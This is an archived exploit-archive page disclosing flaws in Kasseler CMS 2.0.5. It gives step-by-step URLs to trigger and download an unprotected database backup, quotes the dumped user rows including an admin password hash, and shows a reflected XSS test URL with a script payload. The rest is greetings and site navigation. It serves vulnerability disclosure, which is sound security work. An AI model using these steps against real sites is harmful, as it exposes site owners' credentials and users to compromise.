Kasseler CMS 2.0.5 Disclosure

Kasseler CMS 2.0.5 Disclosure: Posted Apr 27, 2010; Authored by indoushka; Kasseler CMS 2.0.5 suffers from backup disclosure vulnerabilities.; tags | exploit, vulnerability, info disclosure; SHA-256 | a4d251c29a78c6deab47eecad27d7fcf8301b21e4f5642cc0f24f2b15341b183; Download | Favorite | View

Kasseler CMS 2.0.5 Disclosure

========================================================================================                  
| # Title    : kasseler cms 2.0.5 => by Pass / Download Backup Vulnerability   
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                                                                                                                                    
| # Dork     : Copyright ©2007-2009 by Kasseler CMS. All rights reserved.                                                                                                                
| # Tested on: windows SP2 Français V.(Pnx2 2.0)        
| # Bug      : Backup     
http://www.digzip.com/files/0YQG52WD/kasseler_cms_2.0.5_full.zip                                                                
======================      Exploit By indoushka       =================================
# Exploit  :  

1 - http://127.0.0.1/kasseler/backup.php

File size: 37.38 KB
Tables processed: 39
Rows processed: 37

2 - http://127.0.0.1/uploads/backup/auto_2010-04-27_14-29.sql

in lig 645:668 col 1 you found the login information

INSERT INTO `kasseler_users` VALUES
(-1, 'guest', 'Guest', '', '', 'default.png', '0000-00-00 00:00:00', 'default', 0, '', '', '', '', '', 5, '', '0', '', '0000-00-00 00:00:00', '', '', '0000-00-00', 0, '', '', '', '', '', '', 0, -1, 0, 0, 0, 0, 0, 0, '', 0, 'MBzx97cQMjKQ47tJgil9PBQDr', 1, 0, 0, '0.00', 0, 1, NULL),
(1, 'admin', 'admin', 'admin@127.0.0.1', 'http://127.0.0.1/', 'admin.png', '2010-04-27 11:25:22', 'default', 2, NULL, NULL, NULL, NULL, 'd0970714757783e6cf17b26fb8e2298f', 1, NULL, '0.0.0.0', 'N/A', '0000-00-00 00:00:00', 'N/A', 'N/A', '0000-00-00', 0, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, NULL, 1, 0, 0, '0.00', 0, 1, NULL);

3 - XSS :

http://127.0.0.1/index.php?online/<script>alert(213771818860)</script>

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.sa-hacker.com *  www.alkrsan.net * www.mormoroth.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Kasseler CMS 2.0.5 Disclosure

Kasseler CMS 2.0.5 Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Kasseler CMS 2.0.5 Disclosure

Share This

Kasseler CMS 2.0.5 Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems